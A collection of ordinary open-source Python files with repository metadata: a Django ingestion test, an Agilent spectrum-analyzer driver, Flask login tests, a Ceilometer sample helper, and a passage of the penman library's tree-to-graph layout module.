"content_hash": "2841a35a209675c2f4cf3fee7d97e9a5",
"timestamp": "",
"source": "github",
"line_count": 299,
"max_line_length": 93,
"avg_line_length": 30.301003344481604,
"alnum_prop": 0.5934878587196468,
"repo_name": "SBillion/aegroupware",
"id": "3d8d43b3dd4da7661b3bd046373b3e5b10ff2b40",
"size": "9060",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/djangobb_forum/util.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "240030"
},
{
"name": "JavaScript",
"bytes": "761483"
},
{
"name": "PHP",
"bytes": "1052"
},
{
"name": "Perl",
"bytes": "35754"
},
{
"name": "Python",
"bytes": "358520"
},
{
"name": "Ruby",
"bytes": "244"
},
{
"name": "TeX",
"bytes": "2537"
}
],
"symlink_target": ""
} |
"""
.. module:: test_mayer
:synopsis: Tests the ingestion of Mayer database
.. moduleauthor:: Ian Thomas <Ian.Edward.Thomas@rmit.edu.au>
"""
from django.test import TestCase
from smra.smra_portal.ReposPlugin import ReposPlugin
from smra.smra_portal.models import Repository
from smra.smra_portal.models import System
from smra.smra_portal.models import Key
from smra.smra_portal.models import MediaObjectParameter
from smra.smra_portal.models import ParameterName
from smra.smra_portal.repos.Mayer import ReposConverter
# FIXME: must be an easier way than doing this
# FIXME comment above suggests a simpler alternative; this is just a bare
# attribute bag used to fake web-service result objects in the tests.
class NoClass:
    pass
class SimpleIngestTest(TestCase):
    """Ingest a single faked Mayer record and check the converted output."""

    # Demo fixtures that provide the 'smra' System and demo users.
    fixtures = ['sprint4demousers','sprint4demo']

    def setUp(self):
        # Register the Mayer schemas against a fresh repository plugin.
        repos_plugin = ReposPlugin()
        mayer_plugin = ReposConverter()
        mayer_plugin.setup_schemas(repos_plugin)

    def _ingest_records(self,recordset):
        """Push *recordset* through a faked ReposConverter and return a
        (sorted result strings, plugin errors) tuple."""
        self.errors = None
        try:
            system = System.objects.get(name="smra")
        except System.DoesNotExist:
            # The fixture must provide the system; fail hard otherwise.
            self.assertTrue(False)
        try:
            repository = Repository.objects.get(name="Mayer", system=system)
        except Repository.DoesNotExist:
            repository = Repository()
            repository.name = "Mayer"
            repository.system = system
            repository.save()
        repos_plugin = ReposPlugin()
        # NOTE(review): model instances (not their name strings) are passed
        # as the 'name' lookup values below; this relies on implicit string
        # coercion by the ORM -- confirm this is intended.
        repos_plugin.sys = System.objects.get(name=system)
        repos_plugin.repos = Repository.objects.get(name=repository,
                                                    system=system)
        res1 = NoClass()
        res1.Mayer_recordset = []
        res1.Mayer_recordset.append(recordset)
        # Fake the 'findall' web-service call so it returns our recordset.
        test_results = {"findall":res1}
        from smra.smra_portal.repos.Mayer import ReposConverter
        mayer_plugin = ReposConverter(fake=test_results)
        mayer_plugin.setup_schemas(repos_plugin)
        (new_objs,
         new_objects_count,
         result_count) = mayer_plugin.process_one_ws_call(repos_plugin)
        self.assertEquals(new_objects_count, 1)
        self.assertEquals(result_count, 1)
        res = []
        for obj in new_objs:
            res.append("%s" % obj.description)
            # NOTE(review): found_ingested is assigned but never used --
            # confirm it is dead before removing.
            found_ingested = False
            for param in MediaObjectParameter.objects.filter(paramset__media_object=obj):
                res.append("type=%s name=%s val=%s" % (param.name.get_type_string(param.name.type),param.name.name,param.value))
        # Sort so the expected-value comparison is order-independent.
        res.sort()
        self.errors = repos_plugin.errors
        return (res,self.errors)

    def test_simple(self):
        """
        Test that we can connect to the AFI mock and pull and convert
        single record
        """
        recordset = ['foobar',{'TITLE':'foofoofoo',
                               'ID':'M 1000',
                               'Creation Date':'May 08, 2001',
                               'DE':'foo',
                               'BN':None}
                     ]
        (res,errors) = self._ingest_records(recordset)
        self.assertEqual(str(res),
                         "['foofoofoo', u'type=LINK name=IMDB val=http://www.imdb.com/find?s=all&q=foofoofoo', u'type=LINK name=Link to Original Record val=http://afidb.adc.rmit.edu.au/dbtw-wpd/exec/dbtwpub.dll?AC=QBE_QUERY&TN=Mayer&RF=Full+record&NP=4&QY=ID+=+M+1000', u'type=STRING name=Collection val=Mayer', u'type=STRING name=ID val=M 1000', u'type=STRING name=Subject val=foo']"
                         )
        self.assertEquals(errors,[])
| {
"content_hash": "3347f8e87dd2c428b546e93537452077",
"timestamp": "",
"source": "github",
"line_count": 96,
"max_line_length": 384,
"avg_line_length": 38.177083333333336,
"alnum_prop": 0.5778990450204639,
"repo_name": "tectronics/mavrec",
"id": "5963ebb27936bc5d2721a545fe945ca0b74abeb4",
"size": "5284",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "smra/smra_portal/tests/test_mayer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "30199"
},
{
"name": "HTML",
"bytes": "42761"
},
{
"name": "JavaScript",
"bytes": "10786"
},
{
"name": "Python",
"bytes": "875078"
}
],
"symlink_target": ""
} |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilentBase8590E import *
class agilent8594Q(agilentBase8590E):
    "Agilent 8594Q IVI spectrum analyzer driver"

    def __init__(self, *args, **kwargs):
        # Set the expected *IDN? instrument id unless the caller already
        # provided one (setdefault keeps any user override).
        self.__dict__.setdefault('_instrument_id', 'HP8594Q')
        super(agilent8594Q, self).__init__(*args, **kwargs)
        # 8594Q hardware characteristics: 50 ohm input impedance,
        # 9 kHz - 2.9 GHz frequency range.
        self._input_impedance = 50
        self._frequency_low = 9e3
        self._frequency_high = 2.9e9
| {
"content_hash": "b538e62976c38f1df98e84e9cf9264cf",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 77,
"avg_line_length": 37.023809523809526,
"alnum_prop": 0.7401929260450161,
"repo_name": "Diti24/python-ivi",
"id": "6ffc8a6d9de82802e86e17ea986fa974d435d4aa",
"size": "1555",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ivi/agilent/agilent8594Q.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1992462"
}
],
"symlink_target": ""
} |
from flask import url_for
from flask_login import current_user
from werkzeug.exceptions import Unauthorized
from config import TRACKER_PASSWORD_LENGTH_MIN
from tracker.form.login import ERROR_ACCOUNT_DISABLED
from tracker.form.login import ERROR_INVALID_USERNAME_PASSWORD
from .conftest import DEFAULT_USERNAME
from .conftest import assert_logged_in
from .conftest import assert_not_logged_in
from .conftest import create_user
from .conftest import logged_in
def test_login_view(db, client):
    """The login page renders for anonymous visitors."""
    response = client.get(url_for('tracker.login'))
    assert response.status_code == 200
@create_user
def test_login_success(db, client):
    """Valid credentials log the user in and set the current user."""
    credentials = dict(username=DEFAULT_USERNAME, password=DEFAULT_USERNAME)
    resp = client.post(url_for('tracker.login'), follow_redirects=True,
                       data=credentials)
    assert_logged_in(resp)
    assert current_user.name == DEFAULT_USERNAME
@create_user
def test_login_invalid_credentials(db, client):
    """A wrong password is rejected with 401 and an error message."""
    form = {'username': DEFAULT_USERNAME,
            'password': 'N' * TRACKER_PASSWORD_LENGTH_MIN}
    resp = client.post(url_for('tracker.login'), data=form)
    assert_not_logged_in(resp, status_code=Unauthorized.code)
    assert ERROR_INVALID_USERNAME_PASSWORD in resp.data.decode()
def test_login_invalid_form(db, client):
    """Omitting the password fails form validation with 401."""
    resp = client.post(url_for('tracker.login'),
                       data={'username': DEFAULT_USERNAME})
    assert_not_logged_in(resp, status_code=Unauthorized.code)
    assert 'This field is required.' in resp.data.decode()
@create_user(active=False)
def test_login_disabled(db, client):
    """A disabled account cannot log in even with correct credentials."""
    form = {'username': DEFAULT_USERNAME, 'password': DEFAULT_USERNAME}
    resp = client.post(url_for('tracker.login'), data=form)
    assert_not_logged_in(resp, status_code=Unauthorized.code)
    assert ERROR_ACCOUNT_DISABLED in resp.data.decode()
@logged_in
def test_login_logged_in_redirect(db, client):
    """Hitting the login endpoint while authenticated redirects home."""
    resp = client.post(url_for('tracker.login'), follow_redirects=False)
    assert resp.status_code == 302
    assert resp.location.endswith('/')
@logged_in
def test_logout(db, client):
    """Logging out ends the authenticated session."""
    resp = client.post(url_for('tracker.logout'), follow_redirects=True)
    assert_not_logged_in(resp)
def test_logout_not_logged_in(db, client):
    """Logging out without a session just redirects home."""
    resp = client.post(url_for('tracker.logout'), follow_redirects=False)
    assert resp.status_code == 302
    assert resp.location.endswith('/')
| {
"content_hash": "04fcb1d48422f097255dcd7c50e678ed",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 115,
"avg_line_length": 35.333333333333336,
"alnum_prop": 0.7186963979416809,
"repo_name": "anthraxx/arch-security-tracker",
"id": "823917baa1bbdbf8b90c56b9d4288ae38df24a62",
"size": "2332",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_login.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8344"
},
{
"name": "HTML",
"bytes": "48394"
},
{
"name": "Makefile",
"bytes": "443"
},
{
"name": "Python",
"bytes": "150444"
},
{
"name": "Shell",
"bytes": "540"
}
],
"symlink_target": ""
} |
import copy
from oslo_utils import timeutils
from six.moves.urllib import parse as urlparse
from ceilometer import sample
def get_metadata_from_host(host_url):
    """Return base resource metadata derived from a split host URL."""
    resource_url = urlparse.urlunsplit(host_url)
    return {'resource_url': resource_url}
def make_resource_metadata(res_metadata=None, host_url=None):
    """Merge caller-supplied metadata with metadata derived from *host_url*.

    The host-derived keys win on conflict, since they are applied last.
    """
    merged = {}
    if res_metadata is not None:
        # Shallow-copy so the caller's dict is never mutated.
        merged.update(copy.copy(res_metadata))
    merged.update(get_metadata_from_host(host_url))
    return merged
def make_sample_from_host(host_url, name, sample_type, unit, volume,
                          project_id=None, user_id=None, resource_id=None,
                          res_metadata=None, extra=None):
    """Build a ``hardware.*`` Sample for the given host.

    Explicit project/user/resource id arguments take precedence over
    values found in *extra*; the host's name is the resource id of
    last resort.
    """
    extra = extra or {}
    resource_metadata = make_resource_metadata(res_metadata, host_url)
    # *extra* values override both caller metadata and host-derived keys.
    resource_metadata.update(extra)
    res_id = resource_id or extra.get('resource_id') or host_url.hostname
    return sample.Sample(
        name='hardware.' + name,
        type=sample_type,
        unit=unit,
        volume=volume,
        user_id=user_id or extra.get('user_id'),
        project_id=project_id or extra.get('project_id'),
        resource_id=res_id,
        # NOTE(review): timeutils.isotime() is deprecated in newer
        # oslo.utils releases -- confirm before upgrading the dependency.
        timestamp=timeutils.isotime(),
        resource_metadata=resource_metadata,
        source='hardware',
    )
| {
"content_hash": "63af74002f928e68f01a38b7e9bb2870",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 74,
"avg_line_length": 31.404761904761905,
"alnum_prop": 0.6588324488248674,
"repo_name": "yanheven/ceilometer",
"id": "61c2159edb97ba7ad42adfb90dc44af023ebee7c",
"size": "2072",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "ceilometer/hardware/pollsters/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2969045"
},
{
"name": "Shell",
"bytes": "4227"
}
],
"symlink_target": ""
} |
"""
Interpreting trees to graphs and configuring graphs to trees.
In order to serialize graphs into the PENMAN format, a tree-like
layout of the graph must be decided. Deciding a layout includes
choosing the order of the edges from a node and the paths to get to a
node definition (the position in the tree where a node's concept and
edges are specified). For instance, the following graphs for "The dog
barked loudly" have different edge orders on the ``b`` node::
(b / bark-01 (b / bark-01
:ARG0 (d / dog) :mod (l / loud)
:mod (l / loud)) :ARG0 (d / dog))
With re-entrancies, there are choices about which location of a
re-entrant node gets the full definition with its concept (node
label), etc. For instance, the following graphs for "The dog tried to
bark" have different locations for the definition of the ``d`` node::
(t / try-01 (t / try-01
:ARG0 (d / dog) :ARG0 d
:ARG1 (b / bark-01 :ARG1 (b / bark-01
:ARG0 d)) :ARG0 (d / dog))
With inverted edges, there are even more possibilities, such as::
(t / try-01 (t / try-01
:ARG0 (d / dog :ARG1 (b / bark-01
:ARG0-of b) :ARG0 (d / dog
:ARG1 (b / bark-01)) :ARG0-of t)))
This module introduces two epigraphical markers so that a pure graph
parsed from PENMAN can retain information about its tree layout
without altering its graph properties. The first marker type is
:class:`Push`, which is put on a triple to indicate that the triple
introduces a new node context, while the sentinel :data:`POP`
indicates that a triple is at the end of one or more node contexts.
These markers only work if the triples in the graph's data are
ordered. For instance, one of the graphs above (repeated here) has the
following data::
PENMAN Graph Epigraph
(t / try-01 [('t', ':instance', 'try-01'), :
:ARG0 (d / dog) ('t', ':ARG0', 'd'), : Push('d')
:ARG1 (b / bark-01 ('d', ':instance', 'dog'), : POP
:ARG0 d)) ('t', ':ARG1', 'b'), : Push('b')
('b', ':instance', 'bark-01'), :
('b', ':ARG0', 'd')] : POP
"""
from typing import Union, Mapping, Callable, Any, List, Set, cast
import copy
import logging
from penman.exceptions import LayoutError
from penman.types import (Variable, Role, BasicTriple, Branch, Node)
from penman.epigraph import Epidatum
from penman.surface import (Alignment, RoleAlignment)
from penman.tree import (Tree, is_atomic)
from penman.graph import (Graph, CONCEPT_ROLE)
from penman.model import Model
logger = logging.getLogger(__name__)
_default_model = Model()
_Nodemap = Mapping[Variable, Union[Node, None]]
# Epigraphical markers
# Common base for Push/Pop so layout markers can be filtered as a group
# (see reconfigure()).
class LayoutMarker(Epidatum):
    """Epigraph marker for layout choices."""
class Push(LayoutMarker):
    """Epigraph marker to indicate a new node context."""

    __slots__ = 'variable',

    def __init__(self, variable):
        # The variable whose node context this marker opens.
        self.variable = variable

    def __repr__(self):
        return 'Push({})'.format(self.variable)
class Pop(LayoutMarker):
    """Epigraph marker to indicate the end of a node context."""

    __slots__ = ()

    def __repr__(self):
        return 'POP'


# Pop carries no state, so a single shared instance suffices.
#: A singleton instance of :class:`Pop`.
POP = Pop()
# Tree to graph interpretation ################################################
def interpret(t: Tree, model: Model = None) -> Graph:
    """
    Interpret tree *t* as a graph using *model*.

    Tree interpretation is the process of transforming the nodes and
    edges of a tree into a directed graph. A semantic model determines
    which edges are inverted and how to deinvert them. If *model* is
    not provided, the default model will be used.

    Args:
        t: the :class:`~penman.tree.Tree` to interpret
        model: the :class:`~penman.model.Model` used to interpret *t*
    Returns:
        The interpreted :class:`~penman.graph.Graph`.
    Example:
        >>> from penman.tree import Tree
        >>> from penman import layout
        >>> t = Tree(
        ...   ('b', [
        ...     ('/', 'bark-01'),
        ...     ('ARG0', ('d', [
        ...       ('/', 'dog')]))]))
        >>> g = layout.interpret(t)
        >>> for triple in g.triples:
        ...     print(triple)
        ...
        ('b', ':instance', 'bark-01')
        ('b', ':ARG0', 'd')
        ('d', ':instance', 'dog')
    """
    if model is None:
        model = _default_model
    # Collect all tree variables up front so re-entrant node references
    # can be distinguished from plain attribute values during deinversion.
    variables = {v for v, _ in t.nodes()}
    top, triples, epidata = _interpret_node(t.node, variables, model)
    # Build the triple -> epigraph-data map; only the first occurrence of
    # a duplicated triple keeps its epigraph data.
    epimap = {}
    for triple, epis in epidata:
        if triple in epimap:
            logger.warning(
                f'ignoring epigraph data for duplicate triple: {triple}'
            )
        else:
            epimap[triple] = epis
    g = Graph(triples, top=top, epidata=epimap, metadata=t.metadata)
    logger.info('Interpreted: %s', g)
    return g
def _interpret_node(t: Node, variables: Set[Variable], model: Model):
    """Recursively convert tree node *t* into ``(var, triples, epidata)``.

    *epidata* is a list of ``(triple, [Epidatum, ...])`` pairs recording
    layout (Push/Pop) and alignment markers for each emitted triple.
    """
    has_concept = False
    triples = []
    epidata = []
    var, edges = t
    for role, target in edges:
        epis: List[Epidatum] = []
        role, role_epis = _process_role(role)
        epis.extend(role_epis)
        has_concept |= role == CONCEPT_ROLE
        # atomic targets
        if is_atomic(target):
            target, target_epis = _process_atomic(target)
            epis.extend(target_epis)
            triple = (var, role, target)
            if model.is_role_inverted(role):
                if target in variables:
                    triple = model.invert(triple)
                else:
                    # An inverted role whose target is not a variable
                    # cannot be deinverted; keep it as-is and warn.
                    logger.warning('cannot deinvert attribute: %r', triple)
            triples.append(triple)
            epidata.append((triple, epis))
        # nested nodes
        else:
            triple = model.deinvert((var, role, target[0]))
            triples.append(triple)
            # Record that this triple opens the nested node's context.
            epis.append(Push(target[0]))
            epidata.append((triple, epis))
            # recurse to nested nodes
            _, _triples, _epis = _interpret_node(target, variables, model)
            triples.extend(_triples)
            _epis[-1][1].append(POP)  # POP from last triple of nested node
            epidata.extend(_epis)
    if not has_concept:
        # Ensure every node has an instance triple, even if the concept
        # itself is missing (target None).
        instance = (var, CONCEPT_ROLE, None)
        triples.insert(0, instance)
        epidata.append((instance, []))
    return var, triples, epidata
def _process_role(role):
    """Normalize a tree role.

    Maps ``/`` to the concept role and splits any ``~`` alignment off
    into epigraph data; returns ``(role, epis)``.
    """
    epis = ()
    if role == '/':
        return CONCEPT_ROLE, epis
    if '~' in role:
        role, _, alignment = role.partition('~')
        epis = (RoleAlignment.from_string(alignment),)
    return role, epis
def _process_atomic(target):
    """Split a ``~`` alignment off an atomic target.

    Returns ``(target, epis)`` where *epis* holds at most one Alignment.
    """
    epis = ()
    if target and '~' in target:
        if target.startswith('"'):
            # Strings may contain '~' inside the quotes (e.g., URIs), so
            # only text after the closing quote counts as alignment data.
            cut = target.rindex('"') + 1
            if cut < len(target):
                epis = (Alignment.from_string(target[cut:]),)
            target = target[:cut]
        else:
            target, _, alignment = target.partition('~')
            epis = (Alignment.from_string(alignment),)
    return target, epis
# Graph to tree configuration #################################################
def configure(g: Graph,
              top: Variable = None,
              model: Model = None) -> Tree:
    """
    Create a tree from a graph by making as few decisions as possible.

    A graph interpreted from a valid tree using :func:`interpret` will
    contain epigraphical markers that describe how the triples of a
    graph are to be expressed in a tree, and thus configuring this
    tree requires only a single pass through the list of triples. If
    the markers are missing or out of order, or if the graph has been
    modified, then the configuration process will have to make
    decisions about where to insert tree branches. These decisions are
    deterministic, but may result in a tree different than the one
    expected.

    Args:
        g: the :class:`~penman.graph.Graph` to configure
        top: the variable to use as the top of the graph; if ``None``,
            the top of *g* will be used
        model: the :class:`~penman.model.Model` used to configure the
            tree
    Returns:
        The configured :class:`~penman.tree.Tree`.
    Example:
        >>> from penman.graph import Graph
        >>> from penman import layout
        >>> g = Graph([('b', ':instance', 'bark-01'),
        ...            ('b', ':ARG0', 'd'),
        ...            ('d', ':instance', 'dog')])
        >>> t = layout.configure(g)
        >>> print(t)
        Tree(
          ('b', [
            ('/', 'bark-01'),
            (':ARG0', ('d', [
              ('/', 'dog')]))]))
    """
    if model is None:
        model = _default_model
    node, data, nodemap = _configure(g, top, model)
    # remove any superfluous POPs at the end (maybe from dereification)
    while data and isinstance(data[-1], Pop):
        data.pop()
    # if any data remain, the graph was not properly annotated for a tree
    skipped: List[BasicTriple] = []
    while data:
        _skipped, var, data = _find_next(data, nodemap)
        skipped.extend(_skipped)
        data_count = len(data)
        if var is None or data_count == 0:
            raise LayoutError('possibly disconnected graph')
        _, surprising = _configure_node(var, data, nodemap, model)
        # No progress was made and the triple didn't fit predictably:
        # set it aside and retry later.
        if len(data) == data_count and surprising:
            skipped.insert(0, data.pop())
        elif len(data) >= data_count:
            # _configure_node must consume data or be surprising.
            raise LayoutError('unknown configuration error')
        else:
            # Progress was made; retry previously skipped triples.
            data = skipped + data
            skipped.clear()
        # remove any superfluous POPs
        while data and isinstance(data[-1], Pop):
            data.pop()
    if skipped:
        raise LayoutError('incomplete configuration')
    _process_epigraph(node)
    tree = Tree(node, metadata=g.metadata)
    logger.debug('Configured: %s', tree)
    return tree
def _configure(g, top, model):
    """
    Create the tree that can be created without any improvising.

    Returns ``(node, data, nodemap)`` where *data* holds any triples
    that could not be placed in a single ordered pass.
    """
    if len(g.triples) == 0:
        return (g.top, []), [], {}
    # nodemap maps each variable to the tree node that defines it, or
    # None while the variable has no node context yet.
    nodemap: _Nodemap = {var: None for var in g.variables()}
    if top is None:
        top = g.top
    if top not in nodemap:
        raise LayoutError(f'top is not a variable: {top!r}')
    nodemap[top] = (top, [])
    # Reversed so triples can be consumed efficiently with data.pop().
    data = list(reversed(_preconfigure(g, model)))
    node, _ = _configure_node(top, data, nodemap, model)
    return node, data, nodemap
def _preconfigure(g, model):
    """
    Arrange the triples and epidata for ordered traversal.

    Also perform some basic validation of Push markers: a variable may
    only be pushed once, the pushed variable must actually occur in the
    triple, and instance triples may not push.
    """
    data = []
    epidata = g.epidata
    pushed = set()
    for triple in g.triples:
        var, role, target = triple
        epis, push, pops = [], False, []
        for epi in epidata.get(triple, []):
            if isinstance(epi, Push):
                pvar = epi.variable
                if pvar in pushed:
                    logger.warning(
                        f"ignoring secondary node contexts for '{pvar}'"
                    )
                    continue  # change to 'pass' to allow multiple contexts
                if pvar not in (var, target) or role == CONCEPT_ROLE:
                    logger.warning(
                        f"node context '{pvar}' invalid for triple: {triple!r}"
                    )
                    continue
                if pvar == var:
                    # Pushing the source means the triple is expressed
                    # inverted (target side is the current context).
                    triple = model.invert(triple)
                pushed.add(pvar)
                push = True
            elif isinstance(epi, Pop):
                pops.append(epi)
            else:
                epis.append(epi)
        data.append((triple, push, epis))
        # Pops follow the triple they were attached to.
        data.extend(pops)
    return data
def _configure_node(var, data, nodemap, model):
    """
    Configure a node and any descendants.

    Side-effects:
      * *data* is modified
      * *nodemap* is modified
    """
    node = nodemap[var]
    edges = node[1]
    # Something is 'surprising' when a triple doesn't predictably fit
    # given the current state
    surprising = False
    while data:
        datum = data.pop()
        if isinstance(datum, Pop):
            break
        triple, push, epis = datum
        # Finalize triple orientation
        if triple[0] == var:
            _, role, target = triple  # expected situation
        elif triple[2] == var and triple[1] != CONCEPT_ROLE:
            _, role, target = model.invert(triple)  # unexpected inversion
            push = False  # preconfigured push site may no longer be valid
            surprising = True
        else:
            data.append(datum)  # cannot place triple
            surprising = True
            break
        # Insert into tree, recursively configuring nodes
        if role == CONCEPT_ROLE:
            if not target:
                continue  # prefer (a) over (a /) when concept is missing
            edges.insert(0, ('/', target, epis))
        else:
            if push:
                nodemap[target] = (target, [])
                target, _surprising = _configure_node(
                    target, data, nodemap, model
                )
                # NOTE(review): '&=' can only clear the flag here (False &
                # x == False); if the intent is to propagate surprise from
                # the child, '|=' may have been meant -- confirm against
                # upstream before changing.
                surprising &= _surprising
            elif target in nodemap and nodemap[target] is None:
                nodemap[target] = node  # site of potential node context
            edges.append((role, target, epis))
    return node, surprising
def _find_next(data, nodemap):
    """
    Find the next node context; establish if necessary.

    Scans *data* from the end (the next triples to be consumed) and
    returns ``(skipped, var, remaining)`` where *var* is the variable
    of the next usable node context (or ``None`` if none was found).
    """
    var = None
    for i in range(len(data) - 1, -1, -1):
        datum = data[i]
        if isinstance(datum, Pop):
            continue
        source, _, target = datum[0]
        if source in nodemap and _get_or_establish_site(source, nodemap):
            var = source
            break
        elif target in nodemap and _get_or_establish_site(target, nodemap):
            var = target
            break
    # NOTE(review): if *data* is empty the loop never runs and `i` is
    # unbound here (NameError); callers currently guarantee non-empty data.
    pivot = i + 1
    return data[pivot:], var, data[:pivot]
def _get_or_establish_site(var, nodemap):
    """
    Turn a variable target into a node context.

    Returns ``True`` if *var* now has its own node; ``False`` when the
    variable has no mapped site yet.
    """
    # first check if the var is available at all
    if nodemap[var] is not None:
        _var, edges = nodemap[var]
        # if the mapped node's var doesn't match it can be established
        if var != _var:
            node = (var, [])
            nodemap[var] = node
            for i in range(len(edges)):
                # replace the variable in the tree with the new node
                if edges[i][1] == var and edges[i][0] != '/':
                    edge = list(edges[i])
                    edge[1] = node
                    edges[i] = tuple(edge)
                    break
        else:
            pass  # otherwise the node already exists so we're good
        return True
    # var is not yet available
    return False
def _process_epigraph(node):
    """Format epigraph data onto roles and targets.

    Collapses each working ``(role, target, epis)`` triple back into the
    public ``(role, target)`` branch form, appending each marker's string
    form to the role (mode 1) or atomic target (mode 2).
    """
    _, edges = node
    for i, (role, target, epis) in enumerate(edges):
        atomic_target = is_atomic(target)
        for epi in epis:
            if epi.mode == 1:  # role epidata
                role = f'{role!s}{epi!s}'
            elif epi.mode == 2 and atomic_target:  # target epidata
                target = f'{target!s}{epi!s}'
            else:
                logger.warning('epigraphical marker ignored: %r', epi)
        if not atomic_target:
            # Nested node: recurse before collapsing this branch.
            _process_epigraph(target)
        edges[i] = (role, target)
def reconfigure(g: Graph,
                top: Variable = None,
                model: Model = None,
                key: Callable[[Role], Any] = None) -> Tree:
    """
    Create a tree from a graph after discarding any layout markers.

    If *key* is provided, triples are first sorted by ``key(role)``.
    """
    stripped = copy.deepcopy(g)
    # Drop all Push/Pop markers so configure() improvises the layout.
    for epilist in stripped.epidata.values():
        retained = [epi for epi in epilist
                    if not isinstance(epi, LayoutMarker)]
        epilist[:] = retained
    if key is not None:
        # function def because mypy doesn't like key in lambda
        def _role_key(triple):
            return key(triple[1])
        stripped.triples.sort(key=_role_key)
    return configure(stripped, top=top, model=model)
def rearrange(t: Tree,
              key: Callable[[Role], Any] = None,
              attributes_first: bool = False) -> None:
    """
    Sort the branches at each node in tree *t* according to *key*.

    Each node in a tree contains a list of branches. This function
    sorts those lists in-place using the *key* function, which accepts
    a role and returns some sortable criterion.

    If the *attributes_first* argument is ``True``, attribute branches
    appear before any edges.

    Instance branches (``/``) always appear before any other branches.

    Example:
        >>> from penman import layout
        >>> from penman.model import Model
        >>> from penman.codec import PENMANCodec
        >>> c = PENMANCodec()
        >>> t = c.parse(
        ...   '(s / see-01'
        ...   ' :ARG1 (c / cat)'
        ...   ' :ARG0 (d / dog))')
        >>> layout.rearrange(t, key=Model().canonical_order)
        >>> print(c.format(t))
        (s / see-01
           :ARG0 (d / dog)
           :ARG1 (c / cat))
    """
    if attributes_first:
        variables = {node[0] for node in t.nodes()}
    else:
        # With an empty set, criterion1 is False for every branch and
        # attributes/edges are not distinguished.
        variables = set()
    def sort_key(branch: Branch):
        # criterion1: branches whose target is a variable (edges) sort
        # after attributes, since False < True in tuple comparison.
        role, target = branch
        if is_atomic(target):
            criterion1 = target in variables
        else:
            criterion1 = target[0] in variables
        criterion2 = True if key is None else key(role)
        return (criterion1, criterion2)
    _rearrange(t.node, sort_key)
def _rearrange(node: Node, key: Callable[[Branch], Any]) -> None:
    """Sort a node's branches in place, keeping any instance ('/') branch first."""
    _, branches = node
    has_instance = bool(branches) and branches[0][0] == '/'
    head = branches[:1] if has_instance else []
    tail = branches[1:] if has_instance else branches[:]
    # Recurse into nested nodes before sorting this level.
    for _, target in tail:
        if not is_atomic(target):
            _rearrange(target, key=key)
    branches[:] = head + sorted(tail, key=key)
def get_pushed_variable(g: Graph,
                        triple: BasicTriple) -> Union[Variable, None]:
    """
    Return the variable pushed by *triple*, if any, otherwise ``None``.

    Example:
        >>> from penman import decode
        >>> from penman.layout import get_pushed_variable
        >>> g = decode('(a / alpha :ARG0 (b / beta))')
        >>> get_pushed_variable(g, ('a', ':instance', 'alpha'))  # None
        >>> get_pushed_variable(g, ('a', ':ARG0', 'b'))
        'b'
    """
    return next(
        (epi.variable
         for epi in g.epidata[triple]
         if isinstance(epi, Push)),
        None,
    )
def appears_inverted(g: Graph, triple: BasicTriple) -> bool:
    """
    Return ``True`` if *triple* appears inverted in serialization.

    More specifically, this function returns ``True`` if *triple* has
    a :class:`Push` epigraphical marker in graph *g* whose associated
    variable is the source variable of *triple*. This should be
    accurate when testing a triple in a graph interpreted using
    :func:`interpret` (including :meth:`PENMANCodec.decode
    <penman.codec.PENMANCodec.decode>`, etc.), but it does not
    guarantee that a new serialization of *g* will express *triple* as
    inverted as it can change if the graph or its epigraphical markers
    are modified, if a new top is chosen, etc.

    Args:
        g: a :class:`~penman.graph.Graph` containing *triple*
        triple: the triple that does or does not appear inverted
    Returns:
        ``True`` if *triple* appears inverted in graph *g*.
    """
    variables = g.variables()
    if triple[1] == CONCEPT_ROLE or triple[2] not in variables:
        # attributes and instance triples should never be inverted
        return False
    else:
        # edges may appear inverted...
        variable = get_pushed_variable(g, triple)
        if variable is not None:
            # ... when their source is pushed
            return variable == triple[0]
        else:
            # ... or when their target is the current node context
            for variable, _triple in zip(node_contexts(g), g.triples):
                if variable is None:
                    break  # we can no longer guess the node context
                elif _triple == triple:
                    return triple[2] == variable
    # Fallback: context could not be determined; assume not inverted.
    return False
def node_contexts(g: Graph) -> List[Union[Variable, None]]:
    """
    Return the list of node contexts corresponding to triples in *g*.

    If a node context is unknown, the value ``None`` is substituted.

    Example:
        >>> from penman import decode, layout
        >>> g = decode('''
        ...   (a / alpha
        ...      :attr val
        ...      :ARG0 (b / beta :ARG0 (g / gamma))
        ...      :ARG0-of g)''')
        >>> for ctx, trp in zip(layout.node_contexts(g), g.triples):
        ...     print(ctx, ':', trp)
        ...
        a : ('a', ':instance', 'alpha')
        a : ('a', ':attr', 'val')
        a : ('a', ':ARG0', 'b')
        b : ('b', ':instance', 'beta')
